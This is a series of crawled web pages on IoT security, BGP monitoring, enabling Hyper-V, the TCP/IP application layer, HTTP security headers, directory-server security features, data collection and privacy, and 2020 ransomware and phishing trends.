s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00620.warc.gz
en
0.947125
820
2.78125
3
The technological advances triggered by the pandemic offer us the opportunity for smart cities to thrive. Truly smart cities will be those that allow an open and interoperable exchange of data via the Internet of Things (IoT). According to IoT analytics, IoT connections reached 12 billion in 2020, surpassing non-IoT connections. 2021 will bring dramatic changes to how IoT is scaling. This is due to two drivers. Firstly, the health crisis brought to the fore the importance of data-driven strategic decisions for businesses in all sectors. Secondly, it is due to the proliferation of low-power wide-area network (LPWAN) wireless technology, specifically designed for M2M devices with low bandwidth at long range with resilient cellular networks – for example, gas and water supply data. The amount of data generated even by a small city is vast, and city officials must ensure that data at the origin, at rest and across all data exchanges is trusted and secure. For a device and its data to be truly trusted, security must be built in from the start. The familiar SIM already offers a tried-and-tested blueprint. Enhanced features with new SIM standards – such as embedded SIM (eSIM) that are soldered into the device and bolstered by GSMA IoT Safe – provide a way to safeguard businesses from disruptive outages or changes in suppliers while offering the device maker and service provider remote management. Innovations like integrated SIM (iSIM) help unlock entirely new IoT use cases while offering additional out-of-the-box functionality packaged with security for applications services to build on. This technology is already catalyzing new areas of innovation in urban mobility, bringing more e-bikes and e-scooters to our streets or smart tracking solutions that enable real-time visibility of critical goods and supplies. Trust frameworks and transparency will need to be woven into all IoT layers for our cities to dispel concerns and ensure these new technologies can help our smart cities thrive.
<urn:uuid:c90d0161-5555-4dd4-8254-49e0de6c9d75>
CC-MAIN-2022-40
https://kigen.com/resources/blog/solving-iot-trust-to-build-smarter-cities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00620.warc.gz
en
0.927599
400
2.578125
3
As the routing protocol that runs the Internet, Border Gateway Protocol (BGP) is a key piece of the puzzle that helps you understand how your customers get to you. If you want to understand digital experience delivery, then you have to understand the Internet, and BGP visibility is very important if you intend to have operational insights for any business-critical app or service that you are either offering or consuming over the Internet. There are a range of varying claims to BGP visibility or monitoring out there, terms which are themselves quite vague. Consequently, it’s important to understand what types of BGP monitoring exist and how to distinguish them, as well as what key capabilities you need to look for. A (very) short introduction to BGP The BGP is a path vector routing protocol that (put very simply) concerns itself with two major functions: - Establishing routed peerings (communication sessions) between Autonomous Systems (or AS, networks that have registered to participate in the BGP fabric of the Internet), so they can exchange routing information to various prefixes (network addresses). There are currently over 63,000 AS Numbers (ASNs). - Propagating routes to IP prefixes across all those AS. Routes are defined not as paths through individual routers, but as paths through AS. So, when you look at a BGP routing update message, you’ll see a sequence of ASNs which forms an AS-PATH, corresponding to a specific prefix. A BGP routing update can contain multiple AS-PATHS for a prefix, along with multiple AS-Path attributes. Currently, the IPv4 BGP routing table for the Internet contains 768,385 prefixes. The importance of perspective There is an assumption about the Internet that, bar instances of filtering like China’s Great Firewall, you can reach anywhere from anywhere. But in fact the path Internet traffic takes will differ based on where it’s coming from, and a single routing vantage point can introduce inauthentic routes. If you want to get a clear picture of Internet routing it’s necessary to process a lot of different perspectives from different ISPs for global visibility. The growing popularity of BGP monitoring Understanding Internet performance is critical for effective network performance monitoring (NPM) and digital experience monitoring (DEM), and, in stark contrast to a few years ago, BGP monitoring is growing in popularity. Previously many NPM vendors would either actively advise against it or else ignore its existence. But with the rapidly growing prevalence of the cloud, being used to build apps and services, offering customer digital experiences, consuming SaaS, and modernizing your WAN, the necessity of BGP monitoring has become impossible to ignore. Global connectivity is a goal for any self-respecting competitive digital organization, meaning these businesses must also build expertise in interdomain routing, the resulting complex interactions with internal routing policies, BGP policies, and managing ISPs. Even the most skeptical of vendors have been turned around on BGP visibility. Before diving in to the different types of BGP monitoring products available, all of which offer varying degrees of insight into Internet routing behavior, it is helpful to know the key capabilities to look for to support DEM use-cases. Below are some metrics and visualizations that are needed on a time-series, historical basis: 1) Independent AS-PATH visualizations, for example, linked to higher level monitoring against an app or service URL - All prefixes related to monitoring test connectivity to that URL are automatically detected - Prefix path changes - Prefix reachability - Prefix updates 3) Cross-layer correlation - BGP routing data should be time-series correlated to other layers of data including network layer paths, end-to-end network performance metrics (packet loss, latency, jitter), and app-layer metrics (response time, and page load) BGP monitoring: Five execution types But despite the fact that BGP has a clear definition as a protocol, the meaning of the term “BGP monitoring” can vary, depending on who’s making the claim. Here are five ways that BGP routing data is offered as “visibility.” - BGP visibility toolkits: Some large organizations will use open source and commercial tools that perform BGP prefix monitoring on a standalone basis. However, these can be difficult for IT teams to use for troubleshooting application and service issues, as they are typically offered as data feeds. For meaningful troubleshooting capabilities the IT team would need to integrate that data and perform its own correlation against other tools in the stack. It can also be hard to sift through the data from these toolkits as the feeds can be filled with routing issues from the most unstable fringes of the Internet, creating a lot of useless noise. While this is technically legitimate BGP monitoring, it’s not hugely useful to the average IT team. - Light integration: This option involves integrating a feed of BGP routing attribute data into network-layer paths to enhance the path information. What follows can become an issue of semantics: it’s possible to simply label various nodes in a Layer 3 path with the names of the ASN they’re in by doing prefix lookups against a single BGP routing feed. But this barely qualifies as “BGP monitoring,” or “BGP visualization,” since it doesn’t enable you to visualize prefixes or AS-PATHS. - BGP traffic analysis: This approach enhances traffic flow data by prefix matching the source and destination IPs then mapping to BGP attributes for those prefixes, resulting in oversight of traffic volume metrics from a source AS to destination AS, and even via transit AS. This is without a doubt an interesting option and very useful if you’re moving large volumes of service traffic to the Internet. But rather than monitoring or visualizing how BGP routing is working its focused on traffic analytics. - Third-party open source tools: There are a range of external, open source tools, such as RIPEStat BGPlay, that some monitoring products link to. The upside of these is that they have BGP prefix analysis capability. But the downside is rather than allowing for ongoing monitoring, these tools mainly provide a snapshot view, which isn’t integrated with the rest of the product workflow, and therefore not very useful for businesses. - Integrated BGP route monitoring: This option means directly pulling collected global routing tables and updates on a frequent basis and integrating BGP prefix monitoring, reachability information and visualization of ASes, AS paths, path lengths and so forth, with other aspects of DEM so that it delivers insights in real-time for app and service operations visibility. This is the approach which will give you the most accurate perspective – providing as it does BGP routing data from many points on the Internet and utilizing intelligent algorithms. So, is your BGP monitoring for real? A quick hack to determine whether you’re looking at real BGP monitoring or a less than useful copy version is to search the product or vendor name, plus “BGP” and “prefix” and compare the results. This will quickly reveal who is up to speed and writing about real-world BGP issues relating to digital experience delivery; and who can provide useful insights into BGP routing and the Internet to help you as a business understand your digital experience delivery.
<urn:uuid:0453b688-2a77-4bc3-92fa-0df355cbc528>
CC-MAIN-2022-40
https://www.datacenterdynamics.com/en/opinions/why-border-gateway-protocol-bgp-visibility-more-critical-ever/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00620.warc.gz
en
0.923959
1,548
2.859375
3
Let’s learn how to enable Hyper-V in Windows 11. Hyper-V specifically provides hardware virtualization. That means each virtual machine runs on virtual hardware. It lets you create virtual hard drives, virtual switches, and many other virtual devices, all of which can be added to virtual machines. Hyper-V is built into Windows as an optional feature, and It is not preinstalled. Being an IT professional, or a technology enthusiast, many of you need to run multiple operating systems. Hyper-V lets you run multiple operating systems as virtual machines on Windows. It’s recommended to check Hyper-V’s system requirements before proceeding. Hyper-V can be enabled in many ways, including using the control panel, PowerShell, command prompt, or Deployment Imaging Servicing and Management tool (DISM). Read the Latest Information – Cloud PC Enable Windows Subsystem For Linux Android Sandbox And Hyper-V On Windows 11 HTMD Blog (anoopcnair.com)
<urn:uuid:d214ea5c-a095-48bf-a1a9-b8cbda1b21c2>
CC-MAIN-2022-40
https://howtomanagedevices.com/windows-11/7441/enable-hyper-v-feature/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00620.warc.gz
en
0.825238
203
2.8125
3
In the previous section we reviewed several aspects of the Transport Layer. We learned a great deal of information; covering sockets, ports, TCP, UDP, segments, and datagrams. Now we will take a look at the fourth and final layer of the TCP/IP stack: the Application Layer. What Does The Application Layer Do? A lot of newcomers to TCP/IP wonder why an Application Layer is needed, since the Transport Layer handles a lot of interfacing between the network and applications. While this is true, the Application Layer focuses more on network services, APIs, utilities, and operating system environments. If you know the TCP/IP stack and OSI model well enough, you’ll know that there are three OSI model layers that correspond to the TCP/IP Application Layer. By breaking the TCP/IP Application Layer into three separate layers, we can better understand what responsibilities the Application Layer actually has. The OSI Equivalent of the TCP/IP Application Layer - 1. Application Layer – The seventh OSI model layer (which shouldn’t be confused with the TCP/IP stack’s Application Layer). It supports network access, as well as provides services for user applications. - 2. Presentation Layer – The Sixth OSI model layer is the Presentation Layer. It translates data into a format that can be read by many platforms. With all the different operating systems, programs, and protocols floating around, this is a good feature to have. It also has support for security encryption and data compression. - 3. Session Layer – The fifth layer of the OSI model is the Session Layer. It manages communication between applications on a network, and is usually used particularly for streaming media or using web conferencing. To better grasp the concepts of the Application Layer, we’ll take a look at a few examples of the Application Layer in action. Application Layer APIs If you aren’t hip on the nerdy lingo- don’t worry: an API simply stands for Application Programming Interface. An API is just a collection of functions that allows programs to access an internal environment. A good example of an API is DirectX. If you’ve ever run a multimedia application and used Windows at the same time, odds are you have come into contact with DirectX. DirectX is made up of many different components that allow programmers to create multimedia applications (such as video games). There are many types of APIs to delve into. You may have heard of NetBIOS, Winsock, or WinAPI among others. The world of APIs has also extended to web services. You may have heard of a Google API, for instance. In this case Google allows developers to use its internal functions, yet also keeps Google’s internal code safe from prying eyes. (Otherwise, there would be a few security concerns on Google’s part.) The Application Layer handles network services; most notably file and printing, name resolution, and redirector services. Name resolution is the process of mapping an IP address to a human-readable name. You may be familiar with the name Google more so than the IP address of Google. Without name resolution, we would have to remember four octets of numbers for each website we wanted to visit- not very friendly is it? A redirector, otherwise known as a requester, is a service that is largely taken for granted. It is a handy little service that looks at requests a user may make: if it can be fulfilled locally, it is done so. If the request requires a redirection to another computer, then the request is forwarded onto another machine. This enables users to access network resources just like they were an integral part of the local system. A user could browse files on another computer just like they were located on the local computer- obviously redirector services are fairly powerful. Lastly we have file and print services. If a computer needs to access a file server or a printer, these services will allow the computer to do so. It is fairly self-explanatory, but worth reviewing nonetheless. This is where most people have experience- within the network utilities section of the Application Layer. Every time you use a Ping, Arp, or Traceroute command, you are taking full advantage of the Application Layer. It’s quite convenient that the Application Layer is located on the top of the TCP/IP stack. We can send a Ping and, if successful, can verify that the TCP/IP stack is successfully functioning. It’s a good idea to commit each utility to memory, as they are very useful for maintaining, configuring, and troubleshooting networks. Listed below are seven of the most used utilities. Seven TCP Utilities Explained - 1. ARP – Arp stands for Address Resolution Protocol. It is used to map an IP address to a physical address found on your NIC card. Using this command can tell us what physical address belongs to which IP address. - 2. Netstat – Netstat is a handy tool that displays local and remote connections to the computer. It displays IP addresses, ports, protocol being used, and the status of the connection. - 3. Ping – Ping is a simple diagnostic tool that can check for connectivity between two points on a network. It is one of the most used TCP/IP utilities when setting up a network or changing network settings. - 4. TraceRT – Tracert, or traceroute, is a command that will show the path that packets of data take while being sent. It’s handy for checking to see where a possible network failure lies, or even for ensuring that data packets are taking the fastest route possible on a network. - 5. FTP / TFTP – FTP and TFTP are both used for transferring files. It is important to note that FTP is a TCP utility, while TFTP is a UDP utility. TFTP tends to be less secure than FTP, and is generally only used for transferring non-confidential files over a network when speed is concerned. - 6. Hostname – Hostname is a simple command that displays the hostname of the current computer. Simple, yet effective. - 7. Whois – Whois information is just like an online phonebook. It shows the contact information for owners of a particular domain. By using a Whois search, you will find that Google is based in California. The Application Layer isn’t as exciting as the others. We don’t really have much physical interaction with the Application layer, and most of the fun applies to developers and geeks only. There is still much to learn- TCP/IP is just the very beginning of the networking world. But with this lesson on the final TCP/IP layer complete, you can now say that you have a much better understanding of the TCP/IP model. (And networking in general.)
<urn:uuid:6f8660c4-c509-4d9e-957d-70daa4b0e3e0>
CC-MAIN-2022-40
https://www.itprc.com/how-the-application-layer-works/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00620.warc.gz
en
0.918463
1,452
3.546875
4
This short introduction provides an overview of DS security features. When DS servers must store sensitive data, and file permissions alone are not sufficient, they use encryption and digests: Encryption turns source data into a reversible code. Good design makes it extremely hard to recover the data from the code without the decryption key. Encryption uses keys and cryptographic algorithms to convert source data into encrypted codes and back again. Given the decryption key and the details of the algorithm, converting an encrypted code back to source data is straightforward, though it can be computationally intensive. DS software does not implement its own versions of all encryption algorithms. Instead, it often relies on cryptographic algorithms provided by the underlying JVM. DS servers do manage access to encryption keys, however. An important part of server configuration concerns key management. DS servers use encryption to protect data and backup files on disk. They can encrypt password values when you configure a reversible storage scheme. Another important use of encryption is to make network connections secure. A digest (also called a hash) is a non-reversible code generated from source data using a one-way hash function. (A hash function is one that converts input of arbitrary size into output of fixed size.) Good one-way hash design design makes it effectively impossible to retrieve the source data even if you have access to the hash function. The hash function makes it simple to test whether a given value matches the original. Convert the value into a digest with the same hash function. If the new digest matches the original digest, then the values are also identical. DS server use digests to store hashed passwords, making the original passwords extremely hard to recover. They also use digests for authentication and signing. In DS software, two types of encryption keys are used: Symmetric keys , also called secret keys, because they must be kept secret. A single symmetric key is used for both encryption and decryption. Asymmetric key pairs , consisting of a sharable public key and a secret private key. Either key can be used for encryption and the other for decryption. DS servers manage incoming client connections using connection handlers. Each connection handler is responsible for accepting client connections, reading requests, and sending responses. Connection handlers are specific to the protocol and port used. For example, a server uses one connection handler for LDAPS and another for HTTPS. The connection handler configuration includes optional security settings. When you configure a handler, specify a key manager provider and a trust manager provider: The key manager provider retrieves the server certificate when negotiating a secure connection. A key manager provider is backed by a keystore , which stores the server’s key pairs. The trust manager provider retrieves trusted certificates, such as CA certificates, to verify trust for a certificate presented by a peer when setting up a secure connection. A trust manager provider is backed by a keystore that contains trusted certificates, referred to as a truststore when used in this way. DS servers support file-based keystores and PKCS#11 security tokens, such as HSMs. Always use secure connections when allowing access to sensitive information. For details, see Secure Connections. DS servers use cryptographic mechanisms for more than setting up secure connections: Encrypted backup files must be decrypted when restored. Passwords can be protected by encryption rather than hashing, although this is not recommended. Database backends can be encrypted for data confidentiality and integrity. For all operations where data is stored in encrypted form, all replicas must be trusted to access the secret key. Trust between servers depends on a public key infrastructure. This type of infrastructure is explained in more detail in Public Key Infrastructure. Replication requires trust between the servers. Trust enables servers to secure network connections, and to share symmetric keys securely. Servers encrypt symmetric keys with a shared master key, and store them in replicated data. When a server needs the symmetric key for decryption or further encryption, it decrypts its copy with the master key. The component that provides a common interface for cryptographic functions is called the DS Crypto Manager. You can configure the following Crypto Manager features with the Protection for symmetric keys. The alias of the shared master key to use for protecting secret keys. Cipher key lengths, algorithms, and other advanced properties. Authentication is the act of confirming the identity of a principal, such as a user, application, or device. The main reason for authentication is that authorization decisions are based on the identity of the principal. Servers should require authentication before allowing access to any information that is not public. Authentication mechanisms depend on the access protocol. HTTP has a number of mechanisms, such as HTTP Basic. LDAP has other mechanisms, such as anonymous bind and external SASL. For details on supported mechanisms, see Authentication Mechanisms. Authorization is the act of determining whether to grant a principal access to a resource. DS servers authorize access based on these mechanisms: Access control instructions (ACI) Access control instructions provide fine-grained control over LDAP operations permitted for a principal. ACIs can be replicated. Privileges control access to administrative tasks, such as backup and restore operations, making changes to the configuration, and other tasks. Privileges can be replicated. Global access control policies Global access control policies provide coarse-grained access control for proxy servers, where the lack of local access to directory data makes ACIs a poor fit. For details about ACIs and global access control policies with proxy servers, see Access Control. For details about privileges, see Administrative Roles. You must monitor deployed services for evidence of threats and other problems. Interfaces for monitoring include the following: Remote monitoring facilities that clients applications can access over the network. These include JMX and SNMP connection handlers, and the monitor backend that is accessible over LDAP and HTTP. Alerts to notify administrators of significant problems or notable events over JMX or by email. Account status notifications to send users alerts by email, or to log error messages when an account state changes. Logging facilities, including local log files for access, debugging, entry change auditing, and errors. ForgeRock Common Audit event handlers support local logging and sending access event messages to a variety of remote logging and reporting systems. For details, see Monitoring.
<urn:uuid:4930d0d1-84ac-45cb-acd4-7110291b1d61>
CC-MAIN-2022-40
https://backstage.forgerock.com/docs/ds/7.1/security-guide/features.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00020.warc.gz
en
0.871207
1,370
3.453125
3
How much data is produced every day? A quick Google search will tell you the current estimate stands at 2.5 quintillion bytes. For those of us that don’t know the difference between our zettabytes and yottabytes, that’s 2.5 followed by a staggering 18 zeros! Basically, the simple answer is a lot. A lot of data is produced and collected every day – and it is growing exponentially. It might be hard to believe but the vast majority of the world’s data has been created in the last few years. Fueled by the internet of things and the perpetual growth of connected devices and sensors, data continues to grow at an ever-increasing rate as more of our world becomes digitized and ‘datafied’. In fact, IDC predicts the world’s data will grow to 175 zettabytes by 2025. It’s mind-boggling to think that humans are generating this, particularly when looked at in the context of one day. Or is it? Data captured and stored daily includes anything and everything from photos uploaded to social media from your latest vacation, to every time you shout at your Google Home or Amazon Echo to turn on the radio or add to the shopping list, even information gathered by the Curiosity rover currently exploring Mars. Every digital interaction you have is captured. Every time you buy something with your contactless debit card? Every time you stream a song, movie or podcast? It’s all data. When you walk down the street or go for a drive, if you’ve a digital device, whether is your smartphone, smartwatch, or both – more data. The majority of us are aware, possibly apathetic, that this data is collected by companies – but what might be more pernicious is the number of listeners out there and the level of granular engagement that is tracked. From device usage to Facebook likes, Twitches, online comments, even viewing-but-skipping-over a photograph in your feed, whether you swipe left or right on Tinder, filters you apply on selfies – this is all captured and stored. If you have a Kindle, Amazon knows not only how often you change a page but also whether you tap or swipe the screen to do so. When it comes to Netflix, yes, they know what you have watched but they also capture what you search for, how far you’ve gotten through a movie and more. In other words, big data captures the most mundane and intimate moments of people’s lives. It’s not overly surprising that companies want to harvest as much about us as possible because – well, why wouldn’t they? The personal information users give away for free is transformed into a precious commodity. The more data produced, the more information they have to monetize, whether it’s to help them target advertisements at us, track high-traffic areas in stores, show us more dog videos to keep us on their site longer, or even sell to third parties. For the companies, there’s no downside to limitless data collection. Data management: Data protection is weak The nature of technology evolution is that we moved from ephemeral management of data to permanent management of data. The driver of that is functionality. On the one hand, the economics of the situation make it so that there is very little cost to storing massive amounts of data. However, what of the security of that data – the personal, the mundane, the intimate day-to-day details of our lives that we in some cases unwillingly impart? Many express concerns about Google, Facebook and Amazon having too much influence. Others believe it matters not what information is collected but what inferences and predictions are made based upon it. How companies can use it to exert influence like whether someone should maintain their health care benefits, or be released on bail – or even whether governments could influence the electoral – Cambridge Analytica, I hear you shout. However, while these are valid concerns, what should be more troubling is the prospect of said personal data falling into the wrong hands. Security breaches have become all too common. In 2019, cyber-attacks were considered among the top five risks to global stability. Yahoo holds the record for the largest data breach of all time with 3 billion compromised accounts. Other recent notable breaches include First American Financial Corp. who had 885 million records exposed online including bank transactions, social security numbers and more; and Facebook saw 540 million user records exposed on the Amazon cloud server. However, they are certainly not alone sitting atop a long list of breaches. Moreover, while it is certainly easier to point the finger in the direction of hackers, well-known brands including Microsoft, Estee Lauder and MGM Resorts have accidentally exposed data online – visible and unprotected for any and all to claim. COVID-19 has only compounded the issue, providing perfect conditions for cyberattacks and data breaches. By the end of Q2, 2020 it was said to be the “worst year on record” in terms of total records exposed. By October, the number of records breached had grown to a mind-boggling 36 billion. Brands and companies – mostly – do not have bad intentions. They are guilty of greed perhaps, but these breach examples highlight how ill-prepared the industry is in protecting harvested data. The volume collected along with often lack-luster security provides easy pickings for exploitation. In the wrong hands, our seemingly mundane data can be combined with other data streams to provide ammunition to conduct an effective social engineering campaign. For example, there is a lot of information that can be “triangulated” about you that may not be represented by explicit data. Even just by watching when and how you behave on the web, social engineers can determine who your friends and associates are. Think that doesn’t mean much? That information is a key ingredient to many kinds of fraud and impersonations. One could postulate that the progress of social engineers should not be thought of merely as an impressive technological advancement in cybercrime. Rather these criminals have peripherally benefitted from every other industry’s investment in data harvesting. Data management: Rethinking data exposure We give up more data than we’ll ever know. While it would be nearly impossible, if not unrealistic, to shut down this type of collection completely, we need to rethink how much we unwittingly disclose to help reduce the risk of falling foul to cybercrime.
<urn:uuid:1fb53058-3936-4e5c-b4fe-16bc97cca945>
CC-MAIN-2022-40
https://getpicnic.com/2021/12/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00020.warc.gz
en
0.948091
1,336
2.921875
3
Sven Morgenroth on Security Weekly Invicti security researcher Sven Morgenroth joined Paul Asadoorian on Paul’s Security Weekly #652 to describe and demonstrate various HTTP headers related to security. Watch the full interview below and read on for an overview of Sven’s presentation of HTTP security headers. What are HTTP Security Headers? HTTP security headers are a subset of HTTP headers and are exchanged between a web client (usually a browser) and a server to specify the security-related details of HTTP communication. Some HTTP headers that are indirectly related to privacy and security can also be considered HTTP security headers. By enabling suitable headers in web applications and web server settings, you can improve the resilience of your web application against many common attacks, including cross-site scripting (XSS) and clickjacking. See our whitepaper on HTTP security headers for a detailed discussion of available headers. How HTTP Security Headers Can Improve Web Application Security When we talk about web application security, especially on this blog, we usually mean finding exploitable vulnerabilities and fixing them in application code. HTTP security headers provide an extra layer of security by restricting behaviors that the browser and server allow once the web application is running. In many cases, implementing the right headers is a crucial aspect of a best-practice application setup – but how do you know which ones to use? As with other web technologies, HTTP headers come and go depending on browser vendor support. Especially in the field of security, headers that were widely supported a few years ago can already be deprecated. At the same time, completely new proposals can gain universal support in a matter of months. Keeping up with all these changes is not easy. To help you decide what to implement, Invicti checks for the presence and correctness of many HTTP security headers and provides clear information and recommendations. The Most Important HTTP Security Headers Let’s dive into an overview of selected headers, starting with a few of the best-known HTTP response headers. When enabled on the server, HTTP Strict Transport Security (HSTS) enforces the use of encrypted HTTPS connections instead of plain-text HTTP communication. A typical HSTS header might be: Strict-Transport-Security: max-age=63072000; includeSubDomains; preload This would inform the visiting web browser that the current site (including subdomains) is HTTPS-only and the browser should access it over HTTPS for the next 2 years (the max-age value in seconds). The preload directive indicates that the site is present on a global list of HTTPS-only sites. Preloading is intended to speed up page loads and eliminate the risk of man-in-the-middle (MITM) attacks when a site is visited for the first time. The Content Security Policy (CSP) header is the Swiss Army knife of HTTP security headers and the recommended way to protect your websites and applications against XSS attacks. It allows you to precisely control permitted content sources and many other parameters. A basic CSP header to allow only assets from the local origin is: Content-Security-Policy: default-src 'self' Other directives include img-src to specify permitted sources for scripts, CSS stylesheets, and images. For example, specifying script-src 'self' would only allow scripts from the local origin. You can also restrict plugin sources using plugin-types (unsupported in Firefox) or Invicti checks if the CSP header is present. This header was first introduced in Microsoft Internet Explorer to provide protection against cross-site scripting attacks involving HTML iframes. To prevent the current page from being loaded into any iframes, you would use: Other supported values are sameorigin to allow loading into iframes with the same origin and allow-from to indicate specific URLs. This header can usually be replaced by suitable CSP directives. Invicti checks if the X-Frame-Options header is present. Deprecated HTTP Security Headers Some headers were introduced as temporary fixes for specific security issues. As web technology moves on, these become deprecated, often after just a few years of browser support. Here are just two examples of deprecated headers that were intended to address specific vulnerabilities. As the name implies, the X-XSS-Protection: 1; mode=block This non-standard header was intended for browsers with XSS filters and provided control of the filtering functionality. In practice, it was relatively easy to bypass or abuse, and as modern browsers no longer use XSS filtering, the header is now deprecated. Invicti checks if you have set X-XSS-Protection for your websites. HTTP Public Key Pinning (HPKP) was introduced in Google Chrome and Firefox as a way to prevent certificate spoofing. It was a complicated mechanism where the server presented the web client with cryptographic hashes of valid certificate public keys for future communication. A typical header would be: Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; max-age=5184000 In practice, public key pinning proved too complicated to use. If incorrectly configured, the header could completely disable website access for the time specified in the max‑age parameter (2 months in this example). The feature was deprecated in favor of certificate transparency logs – see the Expect-CT header below. Other Useful HTTP Security Headers While not as crucial as CSP and HSTS, the headers below can also help you to harden your web application. To prevent website certificate spoofing, the Expect-CT header can be used to indicate that only new certificates added to Certificate Transparency logs should be accepted. A typical header would be: Expect-CT: max-age=86400, enforce, report-uri="https://example.com/report" enforce directive, clients are instructed to refuse connections that violate Certificate Transparency policy. The optional report-uri directive indicates a location for reporting failures. Invicti reports missing Expect-CT headers with a Best Practice severity level. When present in server responses, this header forces web browsers to strictly follow the MIME types specified in Content-Type headers. This protects websites from cross-site scripting attacks that abuse MIME sniffing capabilities to supply malicious code masquerading as a non-executable MIME type. The header has just one directive: Invicti checks if Content-Type headers are set and X-Content-Type-Options: nosniff is present. Fetch Metadata Headers A new set of client-side headers allows the browser to inform the server about different HTTP request attributes. Four headers currently exist: Sec-Fetch-Site: Indicates the intended relationship between the initiator and target origin. Sec-Fetch-Mode: Indicates the intended request mode. Sec-Fetch-User: Indicates if the request was triggered by the user. Sec-Fetch-Dest: Indicates the intended request destination. If supported by both the server and the browser, these headers can be used to inform the server about intended application behaviors to identify suspicious requests. HTTP Headers to Improve Privacy and Security The final items are not strictly HTTP security headers, but they can be used to improve both security and privacy. Controls if and how much referrer information should be revealed to the web server. Typical usage would be: With this header, the browser will only reveal complete referrer information (including the URL) for same-origin requests. For all other requests, only information about the origin is sent. Invicti reports missing Referrer-Policy headers with a Best Practice severity level. This header lets you control the caching of specific web pages. Although several directives are available, typical usage is: This prevents any caching of the server response, which can be useful for ensuring that confidential data is not retained in any caches. Other directives are available for more precise control of caching. To make sure that confidential information from a website is not stored by the browser after the user logs out, you can set the Clear-Site-Data header, for example: This will clear all browsing data related to the site. The storage directives are available for more fine-grained control over what is cleared. This experimental header allows you to deny access to specific browser features and APIs for the current page. This can be used to control application functionality but also to improve privacy and security. For example, to ensure that an application can’t use the microphone and camera APIs, you would send the following header: Feature-Policy: microphone 'none'; camera 'none' Many more directives are available – see the Feature-Policy documentation on MDN for a full list. Keep Track of Your HTTP Security Headers with Invicti HTTP security headers are often an easy way to improve web application security without changing the application itself, so it’s always a good idea to use the most current headers. However, because vendor support for HTTP headers can change so quickly, it’s hard to keep everything updated, especially if you’re working with hundreds of websites. To help you keep up-to-date and stay secure, Invicti’s vulnerability checks include testing for recommended HTTP security headers. Invicti checks if the header is present and correctly configured, and provides clear recommendations to ensure that your web applications always have the best protection.
<urn:uuid:f89351e5-6625-4b23-8c36-8b8e1294d739>
CC-MAIN-2022-40
https://www.invicti.com/blog/web-security/http-security-headers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00221.warc.gz
en
0.857048
2,177
2.609375
3
October is Cybersecurity Awareness Month, which is all about promoting best practices for staying safe online. Beyond promoting the basics of good cyber-hygiene, it's also a good idea to take stock of the trends that have been floating around. Indeed, much like the rest of 2020, it's been quite the year in cybersecurity. COVID-19 brings new and devastatingly creative phishing attacks; ransomware hits remote learning and local governments; and security extends beyond email to collaboration apps. To be a good cyber-citizen means being able to understand these trends and knowing how to take action. Though we could write about thousands of things, there have been a few trends in particular that have stood out as harbingers of the future of cybersecurity. Tracking the first six months of cyber activity, SonicWall found that global ransomware increased by 20%. However, within that increase, a striking amount has been centered in the U.S. In those six months, there's been a 109% increase stateside. The total of 80 million ransomware attacks in America was a whopping 13 times higher than the next highest-country, the U.K. In particular, ransomware cases have been centered around government, public administration agencies and hospitals. This was most notable in the $1.14 million ransom demand that UC San Francisco paid out to recover medical school data. Further, we've seen hackers hit companies involved in the COVID vaccine efforts. In the first quarter of 2020, 21% of all ransomware attacks were against government agencies. Last year, more than 70 state and local governments were hit with ransomware attacks, ranging in size from Greenland, New Hampshire (pop: 3,549) to Baltimore (pop: 619,439) and in general, there was a 41% increase in all ransomware attacks in 2019. The average payment in Q4 of 2019 was more than double what it was in Q3 of that year. IBM's Security X-Force team reported that one in four attacks that they have worked on this year have been caused by ransomware—and one-third of all those attacks happened in June. It's no wonder that one survey found that 89% of companies cite ransomware, phishing and web attacks as their biggest threat. And it's not just companies. With a majority of learning has been happening online, the FBI warned in June of a surge in potential attacks, due to the combination of new technologies and the highly sensitive data that schools hold. We've seen scores of attacks, and they have real-world consequences. A Nevada school district that refused to pay ransom saw reams of student data released. However, it's not an entirely new phenomenon. From October 2019-December 2019, 11 districts were hit with attacks; there was a total of at least 72 hit in all of 2019. And that's just the ones that went public. Ransomware has been, in many respects, the defining trend of the year. And there's no reason to expect it will slow down. Misinformation. Fear. Confusion. Panic. If there was ever a perfect moment for hackers to take advantage of, it was the dawn of COVID-19. There has been a tremendous rise in phishing attacks since COVID-19 hit—too many to document here. One survey found that the increase in attacks can be attributed, at least in part, to hackers’ boredom due to stay-at-home measures. More than that, hackers may be exploiting the human factor in phishing attacks. Hackers are particularly skilled in forcing end-users to make split-second decisions. When employees are juggling their own work, helping children with schoolwork, dealing with limited WiFi and myriad other distractions, that split-second decision becomes a whole lot more difficult. Even with training, and without as many distractions, the aggregate clickthrough rates grants an attacker of a 1 in 10 chance per employee. Now compound that with untrained, distracted employees, and the risk becomes exponential. That's why we've seen some of the following numbers, headlined by this stat—1 in 3 Americans have clicked on a phishing link this year. - One survey found that 46% of businesses worldwide have encountered at least one cybersecurity scare since remote work began, and 49% expect to see another attack in the next month. Further, 51% of companies surveyed found an increase in phishing attacks - Google found that, in one week in April, more than 18 million malware and phishing emails related to COVID-19, along with 240 million daily corona-related spam - Checkpoint found that 4,305 domains have been registered around the CARES Act, the government’s stimulus package. Some 2% of those domains were found malicious, while 21% were found suspicious. - Additionally, Checkpoint saw 192,000 corona-related cyber attacks per week over a three week period ending in early May, a 30% increase. Many phishing attacks claim to be from the World Health Organization, or contain files with “COVID-19” in the name. - IBM X-Force found a more than 6,000% increase in COVID-19 related spam, all ranging from phishing attacks impersonating the Small Business Administration and U.S. Banks. One attack in particular pretended to be from American Express, dangling $2,400 in relief in exchange for credentials. In addition, another report from the company found that attackers are mimicking the SBA, 